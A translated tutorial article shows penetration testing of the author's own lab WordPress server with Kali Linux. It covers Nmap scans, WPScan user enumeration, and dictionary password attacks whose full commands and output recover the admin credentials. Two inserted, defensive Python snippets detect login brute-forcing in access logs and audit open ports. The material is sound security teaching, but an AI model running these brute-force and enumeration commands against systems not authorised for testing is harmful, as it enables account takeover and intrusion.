Find, but don't neutralize: writing penetration tests with Kali Linux

Kali and similar tools help you detect vulnerabilities in your software. And it is better if you find them first, not the intruders.







Security holes do not stay hidden for long: out of ignorance (though in some cases intentionally) even large corporations leave gaps in their defenses. It is vital to (1) locate and (2) fix them as quickly as possible. Fortunately, there are many products that help with the first point. Among them is Kali, a Linux distribution designed for security testing. In this article, I will show how to use Kali Linux to investigate your own system and find weaknesses by simulating an attacker.



The Kali distribution includes many tools, all of them open source. Install the distribution and all of these tools are available out of the box.







Image: Peter Gervase, CC BY-SA 4.0



I will use two systems as test subjects:



  1. kali.usersys.redhat.com: 30 GB of memory and 6 virtual CPUs. This system will scan the victim and launch the attacks.



  2. vulnerable.usersys.redhat.com: a system running Red Hat Enterprise Linux 8. This is the system that will be attacked.


I did not mention the hardware specifications for nothing. Some of our tasks are quite demanding on the hardware, especially the CPU of the system that will run the WordPress security scanner (WPScan).



Search for open ports



I started with a basic scan of system 2. Scanning it with Nmap shows which ports and services are visible from system 1, where the scan is launched.







Image: Peter Gervase, CC BY-SA 4.0



So the first thing to do is to find some "interesting" open ports, that is, potential weaknesses. In fact, any open port is interesting, because each one is a possible way into the network. In this example, 21, 22, 80, and 443 are also the ports of commonly used services. But for now, I am only doing reconnaissance and trying to collect as much information as possible about the system I want to break into.



After that, for a deeper look, I pick port 80 and run Nmap with the -p 80 and -A arguments. This returns information about the operating system and the application listening on port 80.







Image: Peter Gervase, CC BY-SA 4.0



Here we are interested in the following lines:



PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-generator: WordPress 5.6.1







Finding information about users



Since I now know this is a WordPress server, I can use WPScan to look for potential vulnerabilities. It would be useful to find some usernames and their passwords. To enumerate the users of a given WordPress instance, use the --enumerate u option; the output below shows that two users were found, admin and pgervase. I will try to guess the password of the admin user with password dictionaries, text files holding a set of candidate passwords. I will use dictionaries of 3,231 and 3,543,076,137 lines.



┌──(root㉿kali)-[~]
└─# wpscan --url vulnerable.usersys.redhat.com --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |   ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.10
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
[+] Started: Tue Feb 16 21:38:49 2021

Interesting Finding(s):
...

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] pgervase
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)











Password guessing with dictionary attack



Various tools can be used for dictionary attacks. Here are two example commands with Nmap and WPScan:



# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=/path/to/passworddb,threads=6 vulnerable.usersys.redhat.com
# wpscan --url vulnerable.usersys.redhat.com --passwords /path/to/passworddb --usernames admin --max-threads 50 | tee nmap.txt





These two tools, of course, can do much more, but they are also suitable for guessing passwords. 



This WPScan command, for example, prints the recovered password at the end of its output:



┌──(root㉿kali)-[~]
└─# wpscan --url vulnerable.usersys.redhat.com --passwords passwords.txt --usernames admin
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |   ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.10
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
[+] Started: Thu Feb 18 20:32:13 2021

Interesting Finding(s):
...

[+] Performing password attack on Wp Login against 1 user/s
Trying admin / redhat Time: 00:01:57 <=====================================> (3231 / 3231) 100.00% Time: 00:01:57
Trying admin / redhat Time: 00:01:57 <==================                   > (3231 / 6462) 50.00%  ETA: ??:??:??
[SUCCESS] - admin / redhat

[!] Valid Combinations Found:
 | Username: admin, Password: redhat





The Valid Combinations Found section at the end lists the username admin together with its password. It took only two minutes to work through all 3,231 lines.



I have another dictionary file with 3,238,659,984 unique entries, which would take much longer.



Nmap produces results much faster:



┌──(root㉿kali)-[~]
└─# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=password.txt,threads=6 vulnerable.usersys.redhat.com
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 20:48 EST
Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)
Host is up (0.00015s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 8.0 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)
| http-wordpress-brute:
|   Accounts:
|       admin:redhat - Valid credentials              <<<<<<<
|       pgervase:redhat - Valid credentials           <<<<<<<
|_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4      111/tcp     rpcbind
|   100000  2,3,4      111/udp     rpcbind
|   100000  3,4        111/tcp6    rpcbind
|_  100000  3,4        111/udp6    rpcbind
3306/tcp open  mysql   MySQL 5.5.5-10.3.27-MariaDB
MAC Address: 52:54:00:8C:A1:C0 (QEMU virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds







However, such a scan leaves clear traces in the httpd access log of the targeted system:



10.19.47.170 - - [18/Feb/2021:20:14:01 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
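The log excerpt above is exactly what a defender should be alerting on: many POSTs to /wp-login.php from one address in a short window, with a scanner user agent. As an added example (not part of the original article), here is a small detector that parses Apache combined-format log lines and reports both signals; the sample lines, the 60-second window, the threshold of 5 and the scanner user-agent list are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format, as in the httpd access log excerpt above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
SCANNER_UA = ("WPScan", "Nmap Scripting Engine")  # assumed list of scanner UA markers

def parse_line(line):
    """Parse one access-log line into a dict; return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def find_login_bursts(lines, window_s=60, threshold=5):
    """Flag source IPs that POST to /wp-login.php more than `threshold` times within
    any `window_s` seconds, or that send a scanner user agent. Returns {ip: reasons}."""
    posts, findings = defaultdict(list), defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        if any(tag in rec["ua"] for tag in SCANNER_UA):
            findings[rec["ip"]].add("scanner-ua")
        if rec["method"] == "POST" and rec["path"] == "/wp-login.php":
            posts[rec["ip"]].append(rec["ts"])
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over the sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 > threshold:
                findings[ip].add("login-burst")
                break
    return dict(findings)

# Constructed sample: six WPScan login POSTs within three seconds from one IP,
# plus a normal visitor who logs in once and must not be reported.
WPSCAN_LINE = ('10.19.47.170 - - [18/Feb/2021:20:14:0{s} -0500] "POST /wp-login.php HTTP/1.1" '
               '200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"')
SAMPLE = [WPSCAN_LINE.format(s=i % 3) for i in range(6)] + [
    '10.19.47.5 - - [18/Feb/2021:20:16:40 -0500] "GET /index.php HTTP/1.1" 200 10234 "-" "Mozilla/5.0"',
    '10.19.47.5 - - [18/Feb/2021:20:16:58 -0500] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]
print(find_login_bursts(SAMPLE))  # reports only 10.19.47.170, with both reasons
```

Feed it the real access_log one line at a time (for example from a log shipper) and tune the window and threshold to the site's normal login rate.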







Search for Heartbleed vulnerability



To get information about the HTTPS server and SSL / TLS protocols, I use the sslscan command:



┌──(root㉿kali)-[~]
└─# sslscan vulnerable.usersys.redhat.com
Version: 2.0.6-static
OpenSSL 1.1.1i-dev  xx XXX xxxx

Connected to 10.19.47.242

Testing SSL server vulnerable.usersys.redhat.com on port 443 using SNI name vulnerable.usersys.redhat.com

  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     disabled
TLSv1.0   disabled
TLSv1.1   disabled
TLSv1.2   enabled
TLSv1.3   enabled
<snip>







We see that none of the protocol versions enabled on the server is vulnerable to Heartbleed:



  Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed







So the TLS heartbeat extension cannot be used here to read server memory and the data in it. Oh well, not this time :)



Hacking Prevention and Protection Tips



Many articles could be written on how to resist attackers of all stripes. Here I will limit myself to general recommendations:



  • Examine your system: which ports are open, which ports should be open, who should be able to reach them, and how much traffic should flow through them. Nmap helps with this.






  • Leverage additional tools from your software vendors: for example, Red Hat Enterprise Linux includes Red Hat Insights to tune your system and alert you to potential security threats in a timely manner.
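To make the first recommendation repeatable, here is an added example (not from the article) that parses the port table of Nmap's normal output, like the scan shown earlier, and diffs the open ports against an allowlist of ports that are supposed to be reachable. The sample scan text and the allowlist are constructed assumptions for a web server.

```python
import re

# One row of Nmap's normal-output port table, e.g. "80/tcp   open  http    Apache httpd 2.4.37".
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>open|closed|filtered)\s+"
    r"(?P<service>\S+)\s*(?P<version>.*)$"
)

def parse_nmap_ports(text):
    """Return {(port, proto): (state, service, version)} from Nmap normal output."""
    found = {}
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            key = (int(m["port"]), m["proto"])
            found[key] = (m["state"], m["service"], m["version"].strip())
    return found

def audit_ports(text, expected):
    """Diff the open ports in a scan against an allowlist of (port, proto) pairs
    that are supposed to be reachable. Returns (unexpected_open, expected_missing)."""
    found = parse_nmap_ports(text)
    open_ports = {k for k, v in found.items() if v[0] == "open"}
    return sorted(open_ports - expected), sorted(expected - open_ports)

# Constructed sample in the layout of the Nmap scan shown earlier in the article.
SAMPLE_NMAP = """\
Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)
Host is up (0.00015s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 8.0 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)
111/tcp  open  rpcbind 2-4 (RPC #100000)
3306/tcp open  mysql   MySQL 5.5.5-10.3.27-MariaDB
"""
# Assumed allowlist for a public web server: only SSH, HTTP and HTTPS are expected.
EXPECTED = {(22, "tcp"), (80, "tcp"), (443, "tcp")}

if __name__ == "__main__":
    unexpected, missing = audit_ports(SAMPLE_NMAP, EXPECTED)
    print("unexpected open ports:", unexpected)   # ftp, rpcbind and mysql should not be reachable
    print("expected but not open:", missing)      # 443/tcp is not listening in this sample
```

Run it against a saved `nmap -sV -oN scan.txt` file after every change to the host and treat any non-empty "unexpected" list as a finding to investigate.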


Useful materials (in English)



What is described in this article is just the tip of the iceberg. To dive deeper, you can explore the following resources:















